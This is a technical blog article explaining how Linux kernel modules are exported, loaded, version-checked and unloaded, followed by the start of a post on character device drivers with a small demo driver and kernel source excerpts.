<p>Several sections lie after the ELF header. Sections occupy most of the space of the ELF file. Each section holds the actual data of the file: for example, the .text section contains the code to be executed, and .data contains the data the program will use. There may be a lot of sections; even this very simple hello-world module has 33 sections. When the operating system loads an ELF file into memory, some sections are grouped together into a segment, and some sections may be omitted, i.e. not loaded into memory.</p>
<h2 id="section-header-tables">Section header tables</h2>
<p>The section header table lies at the tail of the ELF file. It is the metadata of the sections: each entry describes the corresponding section, for example where the section starts in the ELF file and its size.</p>
<h1 id="export_symbol-internals">EXPORT_SYMBOL internals</h1>
<p>When we write applications in user space, we often use library functions such as ‘printf’, ‘malloc’ and so on. We don’t need to write these functions ourselves, as they are provided by the glibc library. Likewise, in kernel space, a kernel module often needs kernel functions to do its work, for example ‘printk’ to print something. For static linking, the linker resolves these references at build time, but for dynamic module loading, the kernel must do it by itself; this is called resolving the “unresolved references”. Essentially, processing an unresolved reference means determining the actual address of the symbol the kernel module uses. So there must be somewhere to export these symbols; in the Linux kernel, this is done by the EXPORT_SYMBOL macro. Let’s look at how symbols are exported through EXPORT_SYMBOL.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><include/linux/export.h>
/* For every exported symbol, place a struct in the __ksymtab section */
#define __EXPORT_SYMBOL(sym, sec) \
extern typeof(sym) sym; \
__CRC_SYMBOL(sym, sec) \
static const char __kstrtab_##sym[] \
__attribute__((section("__ksymtab_strings"), aligned(1))) \
= VMLINUX_SYMBOL_STR(sym); \
extern const struct kernel_symbol __ksymtab_##sym; \
__visible const struct kernel_symbol __ksymtab_##sym \
__used \
__attribute__((section("___ksymtab" sec "+" #sym), unused)) \
= { (unsigned long)&sym, __kstrtab_##sym }
#define EXPORT_SYMBOL(sym) \
__EXPORT_SYMBOL(sym, "")
#define EXPORT_SYMBOL_GPL(sym) \
__EXPORT_SYMBOL(sym, "_gpl")
#define EXPORT_SYMBOL_GPL_FUTURE(sym) \
__EXPORT_SYMBOL(sym, "_gpl_future")
</code></pre></div></div>
<p>This shows the EXPORT_SYMBOL definition. Though it seems complicated, we will use our example to instantiate it. Consider our EXPORT_SYMBOL(testexport). After expanding this macro, we get the following (__CRC_SYMBOL(sym, sec) is left for later):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static const char __kstrtab_testexport[] = "testexport";
const struct kernel_symbol __ksymtab_testexport =
{(unsigned long)&testexport, __kstrtab_testexport};
</code></pre></div></div>
<p>The second structure is defined as:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct kernel_symbol
{
unsigned long value;
const char *name;
};
</code></pre></div></div>
<p>So here we can see that EXPORT_SYMBOL just defines variables: ‘value’ is the address of the symbol in memory and ‘name’ is the name of the symbol. Unlike an ordinary definition, the exported function’s name is stored in section “__ksymtab_strings”, and the kernel_symbol variable is stored in section “___ksymtab+testexport”. If you look at the ELF file’s sections, you will not find a “___ksymtab+testexport” section; it is merged into “__ksymtab” by <scripts/module-common.lds>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>SECTIONS {
/DISCARD/ : { *(.discard) }
__ksymtab : { *(SORT(___ksymtab+*)) }
__ksymtab_gpl : { *(SORT(___ksymtab_gpl+*)) }
__ksymtab_unused : { *(SORT(___ksymtab_unused+*)) }
__ksymtab_unused_gpl : { *(SORT(___ksymtab_unused_gpl+*)) }
__ksymtab_gpl_future : { *(SORT(___ksymtab_gpl_future+*)) }
__kcrctab : { *(SORT(___kcrctab+*)) }
__kcrctab_gpl : { *(SORT(___kcrctab_gpl+*)) }
__kcrctab_unused : { *(SORT(___kcrctab_unused+*)) }
__kcrctab_unused_gpl : { *(SORT(___kcrctab_unused_gpl+*)) }
__kcrctab_gpl_future : { *(SORT(___kcrctab_gpl_future+*)) }
}
</code></pre></div></div>
<p>As for EXPORT_SYMBOL_GPL and EXPORT_SYMBOL_GPL_FUTURE, the only difference is that the section name gets a “_gpl” or “_gpl_future” suffix.
In order to let the kernel use these sections to find the exported symbols, the linker must export the addresses of these sections. See <include/asm-generic/vmlinux.lds.h>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/* Kernel symbol table: Normal symbols */ \
__ksymtab : AT(ADDR(__ksymtab) - LOAD_OFFSET) { \
VMLINUX_SYMBOL(__start___ksymtab) = .; \
*(SORT(___ksymtab+*)) \
VMLINUX_SYMBOL(__stop___ksymtab) = .; \
} \
\
/* Kernel symbol table: GPL-only symbols */ \
__ksymtab_gpl : AT(ADDR(__ksymtab_gpl) - LOAD_OFFSET) { \
VMLINUX_SYMBOL(__start___ksymtab_gpl) = .; \
*(SORT(___ksymtab_gpl+*)) \
VMLINUX_SYMBOL(__stop___ksymtab_gpl) = .; \
} \
\
/* Kernel symbol table: Normal unused symbols */ \
__ksymtab_unused : AT(ADDR(__ksymtab_unused) - LOAD_OFFSET) { \
VMLINUX_SYMBOL(__start___ksymtab_unused) = .; \
*(SORT(___ksymtab_unused+*)) \
VMLINUX_SYMBOL(__stop___ksymtab_unused) = .; \
} \
...
</code></pre></div></div>
<p>In <kernel/module.c> we can see the declaration:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/* Provided by the linker */
extern const struct kernel_symbol __start___ksymtab[];
extern const struct kernel_symbol __stop___ksymtab[];
extern const struct kernel_symbol __start___ksymtab_gpl[];
extern const struct kernel_symbol __stop___ksymtab_gpl[];
extern const struct kernel_symbol __start___ksymtab_gpl_future[];
extern const struct kernel_symbol __stop___ksymtab_gpl_future[];
</code></pre></div></div>
<p>So after this, the kernel can use ‘__start___ksymtab’ and the other variables without any errors.</p>
<p>Now let’s talk more about the “__ksymtab” section of the ELF file. First, dump this section:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># readelf --hex-dump=_ksymtab hello.ko
readelf: Warning: Section '_ksymtab' was not dumped because it does not exist!
# readelf --hex-dump=__ksymtab hello.ko
Hex dump of section '__ksymtab':
NOTE: This section has relocations against it, but these have NOT been applied to this dump.
0x00000000 00000000 00000000 00000000 00000000 ................
</code></pre></div></div>
<p>Interesting, they are all zeros! Where is our data?
If you look at the section headers more carefully, you can see that some sections begin with “.rela”.
There is a ‘.rela__ksymtab’ section:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># readelf -S hello.ko
There are 33 section headers, starting at offset 0x45ab8:
Section Headers:
[Nr] Name Type Address Offset
Size EntSize Flags Link Info Align
[ 0] NULL 0000000000000000 00000000
0000000000000000 0000000000000000 0 0 0
[ 1] .note.gnu.build-i NOTE 0000000000000000 00000040
0000000000000024 0000000000000000 A 0 0 4
[ 2] .text PROGBITS 0000000000000000 00000070
0000000000000051 0000000000000000 AX 0 0 16
[ 3] .rela.text RELA 0000000000000000 00025be8
00000000000000d8 0000000000000018 I 30 2 8
[ 4] __ksymtab PROGBITS 0000000000000000 000000d0
0000000000000010 0000000000000000 A 0 0 16
[ 5] .rela__ksymtab RELA 0000000000000000 00025cc0
0000000000000030 0000000000000018 I 30 4 8
[ 6] __kcrctab PROGBITS 0000000000000000 000000e0
0000000000000008 0000000000000000 A 0 0 8
[ 7] .rela__kcrctab RELA 0000000000000000 00025cf0
</code></pre></div></div>
<p>The ‘.rela__ksymtab’ section’s type is RELA. This means the section contains relocation data: which data will be modified, and how, when the final object is loaded into the kernel. The ‘.rela__ksymtab’ section contains the relocation data for ‘__ksymtab’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># readelf -r hello.ko | head -20
Relocation section '.rela.text' at offset 0x25be8 contains 9 entries:
Offset Info Type Sym. Value Sym. Name + Addend
000000000001 001f00000002 R_X86_64_PC32 0000000000000000 __fentry__ - 4
000000000008 00050000000b R_X86_64_32S 0000000000000000 .rodata.str1.1 + 0
00000000000d 002400000002 R_X86_64_PC32 0000000000000000 printk - 4
000000000021 001f00000002 R_X86_64_PC32 0000000000000000 __fentry__ - 4
000000000028 00050000000b R_X86_64_32S 0000000000000000 .rodata.str1.1 + f
00000000002d 002400000002 R_X86_64_PC32 0000000000000000 printk - 4
000000000041 001f00000002 R_X86_64_PC32 0000000000000000 __fentry__ - 4
000000000048 00050000000b R_X86_64_32S 0000000000000000 .rodata.str1.1 + 1f
00000000004d 002400000002 R_X86_64_PC32 0000000000000000 printk - 4
Relocation section '.rela__ksymtab' at offset 0x25cc0 contains 2 entries:
Offset Info Type Sym. Value Sym. Name + Addend
000000000000 002300000001 R_X86_64_64 0000000000000000 testexport + 0
000000000008 000600000001 R_X86_64_64 0000000000000000 __ksymtab_strings + 0
Relocation section '.rela__kcrctab' at offset 0x25cf0 contains 1 entries:
Offset Info Type Sym. Value Sym. Name + Addend
</code></pre></div></div>
<p>Here we can see that section ‘.rela__ksymtab’ has 2 entries. I will not dig into the RELA section format; just notice that 0x23 and 0x06 are used to index the .symtab section. So when the .ko is loaded into the kernel, the first 8 bytes of section ‘__ksymtab’ will be replaced by the actual address of testexport, and the second 8 bytes will be replaced by the actual address of the string at ‘__ksymtab_strings+0’, which is ‘testexport’. So this is how the kernel_symbol structure created by EXPORT_SYMBOL gets its final values.</p>
<h1 id="module-load-process">Module load process</h1>
<p>The init_module system call is used to load a kernel module into the kernel. A user space application loads the .ko file into user space and then passes the address and size of the .ko, together with the arguments the kernel module will use, to this system call. init_module just allocates memory, copies the user’s data to the kernel, and then calls the actual work function, load_module. In general we can split the load_module function into two logical parts. The first part completes the load work, such as reallocating memory to hold the kernel module, resolving symbols, and applying relocations. The second part does the remaining work, such as calling the module’s init function and cleaning up allocated resources. Before we go to the first part, let’s look at a very important structure, ‘struct module’:
<include/linux/module.h></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct module {
enum module_state state;
/* Member of list of modules */
struct list_head list;
/* Unique handle for this module */
char name[MODULE_NAME_LEN];
/* Sysfs stuff. */
struct module_kobject mkobj;
struct module_attribute *modinfo_attrs;
const char *version;
const char *srcversion;
struct kobject *holders_dir;
/* Exported symbols */
const struct kernel_symbol *syms;
const unsigned long *crcs;
unsigned int num_syms;
/* Kernel parameters. */
struct kernel_param *kp;
unsigned int num_kp;
...
}
</code></pre></div></div>
<p>Here I just list some of the fields of ‘struct module’. It represents a module in the kernel and contains the information about the kernel module. For example, ‘state’ indicates the status of the module and changes during the load process, ‘list’ links all of the modules in the kernel, and ‘name’ contains the module name.
Below are some important functions that load_module calls.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>load_module
-->layout_and_allocate
-->setup_load_info
-->rewrite_section_headers
-->layout_sections
-->layout_symtab
-->move_module
-->find_module_sections
-->simplify_symbols
-->apply_relocations
-->parse_args
-->do_init_module
</code></pre></div></div>
<p>The rewrite_section_headers function replaces each section header’s ‘sh_addr’ field with the section’s real address in memory. Then, in function setup_load_info, ‘mod’ is initialized with the real address of the “.gnu.linkonce.this_module” section. This section contains data the compiler set up for us. In the source directory, we can see a hello.mod.c file:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>__visible struct module __this_module
__attribute__((section(".gnu.linkonce.this_module"))) = {
.name = KBUILD_MODNAME,
.init = init_module,
#ifdef CONFIG_MODULE_UNLOAD
.exit = cleanup_module,
#endif
.arch = MODULE_ARCH_INIT,
};
</code></pre></div></div>
<p>So here we can see that ‘mod’ has some fields pre-filled. The interesting thing is that the init function is init_module, not our hello_init. The magic is done by module_init,
as follows (include/linux/init.h):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/* Each module must use one module_init(). */
#define module_init(initfn) \
static inline initcall_t __inittest(void) \
{ return initfn; } \
int init_module(void) __attribute__((alias(#initfn)));
</code></pre></div></div>
<p>From here we can see that the compiler sets ‘init_module’ as an alias of our init function, which is ‘hello_init’ in our example.
Next, the function ‘layout_sections’ calculates the ‘core’ size and ‘init’ size of the ELF file. Then, if CONFIG_KALLSYMS is defined, ‘layout_symtab’ is called and the symbol info is added to the core section.
After calculating the core and init sections, load_module allocates space for them in function ‘move_module’ and copies the original section data to the new space. The sections’ sh_addr must then be updated, and so must the address of ‘mod’:</p>
<p>mod = (void *)info->sechdrs[info->index.mod].sh_addr;</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> core section
+------------+ <-----mod->module_core
+-> | |
| +------------+
+------------+ +---> | |
| ELF header | | | +------------+
+------------+ | | | |
| section 0 +---+ +------------+
+------------+ |
| section 1 +----+
+------------+ | | init section
| section 2 +----+ +------------+ <-----mod->module_init
+------------+ | +-> | |
| section 3 +-+ | +------------+
+------------+ +-> | ||
|sec head table +------------+
+------------+ | |
| |
+------------+
</code></pre></div></div>
<p>So for now, the layout looks like the diagram above.</p>
<p>Later, ‘load_module’ calls ‘find_module_sections’ to get the exported symbols.
Next, it calls ‘simplify_symbols’ to fix up the symbols. The function call chain is
simplify_symbols –> resolve_symbol_wait –> resolve_symbol –> find_symbol –> each_symbol_section.
In the last function, it first iterates the kernel’s exported symbols and then iterates the loaded modules’ symbols.
If ‘resolve_symbol’ succeeds, it calls ‘ref_module’ to establish the dependency between the module currently being loaded and the module owning the symbol it uses. This is done in ‘add_module_usage’:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int add_module_usage(struct module *a, struct module *b)
{
struct module_use *use;
pr_debug("Allocating new usage for %s.\n", a->name);
use = kmalloc(sizeof(*use), GFP_ATOMIC);
if (!use) {
pr_warn("%s: out of memory loading\n", a->name);
return -ENOMEM;
}
use->source = a;
use->target = b;
list_add(&use->source_list, &b->source_list);
list_add(&use->target_list, &a->target_list);
return 0;
}
</code></pre></div></div>
<p>Here a is the module currently being loaded, and b is the module whose symbol a uses.
module->source_list links the modules that depend on this module, and module->target_list links the modules it depends on.</p>
<p>After fixing up the symbols, ‘load_module’ does the relocation by calling ‘apply_relocations’. If a section’s type is ‘SHT_REL’ or ‘SHT_RELA’, ‘apply_relocations’ calls the arch-specific function. As the symbol table has already been resolved, this relocation is quite simple. Now the addresses of the symbols the module uses have been corrected to the right values.</p>
<p>Next, ‘load_module’ calls ‘parse_args’ to parse the module parameters. Let’s first look at how to define a parameter in a kernel module.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static bool __read_mostly fasteoi = 1;
module_param(fasteoi, bool, S_IRUGO);
#define module_param(name, type, perm) \
module_param_named(name, name, type, perm)
#define module_param_named(name, value, type, perm) \
param_check_##type(name, &(value)); \
module_param_cb(name, &param_ops_##type, &value, perm); \
__MODULE_PARM_TYPE(name, #type)
#define module_param_cb(name, ops, arg, perm) \
__module_param_call(MODULE_PARAM_PREFIX, name, ops, arg, perm, -1, 0)
#define __module_param_call(prefix, name, ops, arg, perm, level, flags) \
/* Default value instead of permissions? */ \
static const char __param_str_##name[] = prefix #name; \
static struct kernel_param __moduleparam_const __param_##name \
__used \
__attribute__ ((unused,__section__ ("__param"),aligned(sizeof(void *)))) \
= { __param_str_##name, ops, VERIFY_OCTAL_PERMISSIONS(perm), \
level, flags, { arg } }
</code></pre></div></div>
<p>Let’s expand the macros for the ‘fasteoi’ example.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>param_check_bool(fasteoi, &(fasteoi));
static const char __param_str_fasteoi[] = "fasteoi";
static struct kernel_param __moduleparam_const __param_fasteoi \
__used
__attribute__ ((unused,__section__ ("__param"),aligned(sizeof(void *)))) \
= { __param_str_fasteoi, param_ops_bool, VERIFY_OCTAL_PERMISSIONS(S_IRUGO), \
-1, 0, { &fasteoi} }
</code></pre></div></div>
<p>So here we can see that ‘module_param(fasteoi, bool, S_IRUGO);’ defines a ‘struct kernel_param’ variable and stores it in section ‘__param’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct kernel_param {
const char *name;
const struct kernel_param_ops *ops;
u16 perm;
s8 level;
u8 flags;
union {
void *arg;
const struct kparam_string *str;
const struct kparam_array *arr;
};
};
</code></pre></div></div>
<p>The union member ‘arg’ contains the kernel parameter’s address.</p>
<p>User space passes the module-specific arguments to load_module in the ‘uargs’ argument.
‘parse_args’ walks the parameters one by one, compares each with the data in section ‘__param’, and then writes the user-specified value:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int param_set_bool(const char *val, const struct kernel_param *kp)
{
/* No equals means "set"... */
if (!val) val = "1";
/* One of =[yYnN01] */
return strtobool(val, kp->arg);
}
int strtobool(const char *s, bool *res)
{
switch (s[0]) {
case 'y':
case 'Y':
case '1':
*res = true;
break;
case 'n':
case 'N':
case '0':
*res = false;
break;
default:
return -EINVAL;
}
return 0;
}
</code></pre></div></div>
<h2 id="version-control">Version control</h2>
<p>One thing we have left out is version control. Version control is used to keep consistency between the kernel and a module: we can’t load a module compiled for a 2.6 kernel into a 3.2 kernel. That’s why version control is needed. The kernel and modules use CRC checksums to do this. The idea is simple: the build tools generate a CRC checksum for every exported function and for every function a module references. Then, in the ‘load_module’ function, these two CRCs are checked for equality. To support this mechanism, the kernel config must contain ‘CONFIG_MODVERSIONS’. In the EXPORT_SYMBOL macro, there is a __CRC_SYMBOL definition.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#ifdef CONFIG_MODVERSIONS
/* Mark the CRC weak since genksyms apparently decides not to
* generate a checksums for some symbols */
#define __CRC_SYMBOL(sym, sec) \
extern __visible void *__crc_##sym __attribute__((weak)); \
static const unsigned long __kcrctab_##sym \
__used \
__attribute__((section("___kcrctab" sec "+" #sym), unused)) \
= (unsigned long) &__crc_##sym;
#else
#define __CRC_SYMBOL(sym, sec)
#endif
</code></pre></div></div>
<p>Expand it.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>extern __visible void *__crc_testexport;
static const unsigned long __kcrctab_testexport = (unsigned long) &__crc_testexport;
</code></pre></div></div>
<p>So for every exported symbol, the build tools generate a CRC checksum and store it in section ‘__kcrctab’.</p>
<p>Now back to the module load process. In hello.mod.c we can see the following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static const struct modversion_info ____versions[]
__used
__attribute__((section("__versions"))) = {
{ 0x21fac097, __VMLINUX_SYMBOL_STR(module_layout) },
{ 0x27e1a049, __VMLINUX_SYMBOL_STR(printk) },
{ 0xbdfb6dbb, __VMLINUX_SYMBOL_STR(__fentry__) },
};
struct modversion_info {
unsigned long crc;
char name[MODULE_NAME_LEN];
};
</code></pre></div></div>
<p>The ELF file has an array of struct modversion_info stored in section ‘__versions’; each element in this array has a crc and a name identifying a symbol the module references.</p>
<p>When ‘resolve_symbol’ finds a symbol, it calls ‘check_version’. Function ‘check_version’ iterates the ‘__versions’ array and compares the found symbol’s CRC checksum. If it is the same, the check passes.</p>
<h2 id="modinfo">Modinfo</h2>
<p>A .ko file also contains a ‘.modinfo’ section which stores some of the module information. The modinfo program can show this info. In the source code, one can use ‘MODULE_INFO’ to add this information.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#define MODULE_INFO(tag, info) __MODULE_INFO(tag, tag, info)
#ifdef MODULE
#define __MODULE_INFO(tag, name, info) \
static const char __UNIQUE_ID(name)[] \
__used __attribute__((section(".modinfo"), unused, aligned(1))) \
= __stringify(tag) "=" info
#else /* !MODULE */
/* This struct is here for syntactic coherency, it is not used */
#define __MODULE_INFO(tag, name, info) \
struct __UNIQUE_ID(name) {}
#endif
</code></pre></div></div>
<p>MODULE_INFO simply defines a key-value string in the ‘.modinfo’ section when MODULE is defined. MODULE_INFO is used in several places, such as license and vermagic:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#define MODULE_LICENSE(_license) MODULE_INFO(license, _license)
/*
* Author(s), use "Name <email>" or just "Name", for multiple
* authors use multiple MODULE_AUTHOR() statements/lines.
*/
#define MODULE_AUTHOR(_author) MODULE_INFO(author, _author)
/* What your module does. */
#define MODULE_DESCRIPTION(_description) MODULE_INFO(description, _description)
MODULE_INFO(vermagic, VERMAGIC_STRING);
</code></pre></div></div>
<h2 id="vermagic">vermagic</h2>
<p>vermagic is a string generated from kernel configuration information. ‘load_module’ checks it in ‘layout_and_allocate’->’check_modinfo’->’same_magic’. ‘VERMAGIC_STRING’ is defined as:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#define VERMAGIC_STRING \
UTS_RELEASE " " \
MODULE_VERMAGIC_SMP MODULE_VERMAGIC_PREEMPT \
MODULE_VERMAGIC_MODULE_UNLOAD MODULE_VERMAGIC_MODVERSIONS \
MODULE_ARCH_VERMAGIC
</code></pre></div></div>
<p>After this tough work, ‘load_module’ reaches its final task and calls ‘do_init_module’.
If the module has an init function, ‘do_init_module’ calls it through ‘do_one_initcall’, then changes the module’s state to ‘MODULE_STATE_LIVE’, calls the functions registered on the ‘module_notify_list’ list, and finally frees the module’s INIT sections.</p>
<h1 id="unload-module">Unload module</h1>
<p>Unloading a module is quite easy. It is done by the ‘delete_module’ syscall, which takes only the module name as its argument. It first finds the module in the modules list, checks whether other modules depend on it, calls the module’s exit function, and finally notifies everyone interested in module unload by iterating ‘module_notify_list’.</p>
Anatomy of the Linux character devices2018-06-02T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2018/06/02/linux-character-devices
<p>Character devices are one class of Linux devices; other classes include block devices and network devices. Every device class has its own support infrastructure in the kernel, often called the device driver model. This article discusses the simple character device model.</p>
<p>First we need to prepare a simple character device driver and a user program that uses it.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@debian986:~# cat demo_chr_dev.c
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/fs.h>
#include <linux/cdev.h>
static struct cdev chr_dev;
static dev_t ndev;
static int chr_open(struct inode *nd, struct file *filp)
{
int major = MAJOR(nd->i_rdev);
int minor = MINOR(nd->i_rdev);
printk("chr_open, major = %d, minor = %d\n", major, minor);
return 0;
}
static ssize_t chr_read(struct file *f, char __user *u, size_t len, loff_t *off)
{
printk("In the chr_read() function\n");
return 0;
}
struct file_operations chr_ops =
{
.owner = THIS_MODULE,
.open = chr_open,
.read = chr_read,
};
static int demo_init(void)
{
int ret;
cdev_init(&chr_dev, &chr_ops);
ret = alloc_chrdev_region(&ndev, 0, 1, "chr_dev");
if(ret < 0)
return ret;
printk("demo_init():major = %d, minor = %d\n",MAJOR(ndev), MINOR(ndev));
ret = cdev_add(&chr_dev, ndev, 1);
if(ret < 0)
return ret;
return 0;
}
static void demo_exit(void)
{
printk("Removing chr_dev module...\n");
cdev_del(&chr_dev);
unregister_chrdev_region(ndev, 1);
}
module_init(demo_init);
module_exit(demo_exit);
MODULE_LICENSE("GPL");
root@debian986:~# cat Makefile
obj-m := demo_chr_dev.o
KERNELDIR := /lib/modules/$(shell uname -r)/build
PWD := $(shell pwd)
default:
$(MAKE) -C $(KERNELDIR) M=$(PWD) modules
clean:
rm -f *.o *.ko *.mod.c
</code></pre></div></div>
<p>The userspace program:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@debian986:~# cat main.c
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#define CHR_DEV_NAME "/dev/chr_dev"
int main()
{
int ret;
char buf[32];
int fd = open(CHR_DEV_NAME, O_RDONLY | O_NDELAY);
if(fd < 0)
{
printf("open file %s failed\n", CHR_DEV_NAME);
return -1;
}
read(fd, buf, 32);
close(fd);
return 0;
}
</code></pre></div></div>
<p>First install the .ko; using dmesg we can see the major and minor numbers of the device.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> [ 917.528480] demo_init():major = 249, minor = 0
</code></pre></div></div>
<p>Then we use mknod to create an entry in the /dev directory:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@debian986:~# mknod /dev/chr_dev c 249 0
</code></pre></div></div>
<p>Now we have a character device. Run the main program; dmesg shows that the open and read functions have been executed.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> [ 978.055050] chr_open, major = 249, minor = 0
[ 978.055055] In the chr_read() function
</code></pre></div></div>
<h1 id="character-device-abstract">Character device abstraction</h1>
<p>The Linux kernel uses struct ‘cdev’ to represent character devices.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> //<include/linux/cdev.h>
struct cdev {
struct kobject kobj;
struct module *owner;
const struct file_operations *ops;
struct list_head list;
dev_t dev;
unsigned int count;
};
</code></pre></div></div>
<p>The most important field here is ‘struct file_operations’, which defines the interface to the virtual file system: when a user program triggers a system call like open/read/write, it finally reaches the functions that ops defines.</p>
<p>‘dev’ here represents the device number, containing the major and minor numbers.</p>
<p>‘list’ links all of the character devices in the system.
A cdev is initialized by ‘cdev_init’:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> //<fs/char_dev.c>
void cdev_init(struct cdev *cdev, const struct file_operations *fops)
{
memset(cdev, 0, sizeof *cdev);
INIT_LIST_HEAD(&cdev->list);
kobject_init(&cdev->kobj, &ktype_cdev_default);
cdev->ops = fops;
}
</code></pre></div></div>
<h1 id="device-number">Device number</h1>
<p>Every device has a device number combining a major and a minor number. The major number identifies the device driver; the minor number distinguishes individual devices handled by the same driver.</p>
<p>‘dev_t’ is used to represent a device number; it is a 32-bit unsigned integer.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> //<include/linux/types.h>
typedef __u32 __kernel_dev_t;
typedef __kernel_fd_set fd_set;
typedef __kernel_dev_t dev_t;
</code></pre></div></div>
<p>Its high 12 bits represent the major number and its low 20 bits the minor number.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> //<include/linux/kdev_t.h>
#define MINORBITS 20
#define MAJOR(dev) ((unsigned int) ((dev) >> MINORBITS))
#define MINOR(dev) ((unsigned int) ((dev) & MINORMASK))
</code></pre></div></div>
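<p>The split can be verified with a userspace copy of these macros; MINORMASK and MKDEV are reproduced here following the same header, so this is a sketch rather than kernel code.</p>

```c
#include <assert.h>

/* Userspace copy of the kernel's dev_t encoding: high 12 bits carry
 * the major number, low 20 bits the minor number. */
#define MINORBITS  20
#define MINORMASK  ((1U << MINORBITS) - 1)
#define MAJOR(dev) ((unsigned int) ((dev) >> MINORBITS))
#define MINOR(dev) ((unsigned int) ((dev) & MINORMASK))
#define MKDEV(ma, mi) (((ma) << MINORBITS) | (mi))
```

For example, the device created earlier with major 249 and minor 0 encodes to a single 32-bit value that the macros decode back losslessly.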
<p>A device number can be allocated by two functions:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> register_chrdev_region
alloc_chrdev_region
</code></pre></div></div>
<p>The kernel uses the ‘chrdevs’ global variable to manage device number allocation.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static struct char_device_struct {
struct char_device_struct *next;
unsigned int major;
unsigned int baseminor;
int minorct;
char name[64];
struct cdev *cdev; /* will die */
} *chrdevs[CHRDEV_MAJOR_HASH_SIZE];
</code></pre></div></div>
<p>‘register_chrdev_region’ records the device number in the chrdevs array.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int register_chrdev_region(dev_t from, unsigned count, const char *name)
{
struct char_device_struct *cd;
dev_t to = from + count;
dev_t n, next;
for (n = from; n < to; n = next) {
next = MKDEV(MAJOR(n)+1, 0);
if (next > to)
next = to;
cd = __register_chrdev_region(MAJOR(n), MINOR(n),
next - n, name);
if (IS_ERR(cd))
goto fail;
}
return 0;
fail:
to = n;
for (n = from; n < to; n = next) {
next = MKDEV(MAJOR(n)+1, 0);
kfree(__unregister_chrdev_region(MAJOR(n), MINOR(n), next - n));
}
return PTR_ERR(cd);
}
</code></pre></div></div>
<p>The real work is done by ‘__register_chrdev_region’, which takes a major number and a count of minors. This function inserts the dev_t into the corresponding chrdevs entry.
Of course we first need to get the index:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> i = major_to_index(major);
</code></pre></div></div>
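<p>The hash is a plain modulo over the table size (CHRDEV_MAJOR_HASH_SIZE, 255), which is why majors that are 255 apart chain into the same slot, as the diagram below illustrates. A minimal userspace sketch of the index computation:</p>

```c
#include <assert.h>

#define CHRDEV_MAJOR_HASH_SIZE 255

/* The kernel's major_to_index() is a plain modulo, so majors 255
 * apart share a chrdevs[] slot and are chained on the same list. */
static unsigned int major_to_index(unsigned int major)
{
    return major % CHRDEV_MAJOR_HASH_SIZE;
}
```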
<p>Then ‘__register_chrdev_region’ checks whether the newly added entry conflicts with existing ones; if not, it is added to the chrdevs entry. After major numbers 2 and 257 have been inserted:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> +------------------+
0 | |
+------------------+
1 | | struct char_device_struct
+------------------+
2 | +-------> +---------------+---> +---------------+
+------------------+ | next | | next |
| | +---------------+ +---------------+
| | | major=2 | | major=257 |
| | +---------------+ +---------------+
| | | baseminor=0 | | baseminor=0 |
| | +---------------+ +---------------+
| | | minorct=1 | | minorct=4 |
| | +---------------+ +---------------+
| | | "augdev" | | "devmodev" |
| | +---------------+ +---------------+
+------------------+
254 | |
+------------------+
</code></pre></div></div>
<p>‘alloc_chrdev_region’ differs from ‘register_chrdev_region’ in that the former asks the kernel to allocate a usable major number instead of specifying one. It iterates chrdevs from the end, finds an empty entry, and returns its index as the major number.</p>
<h1 id="character-device-registration">Character device registration</h1>
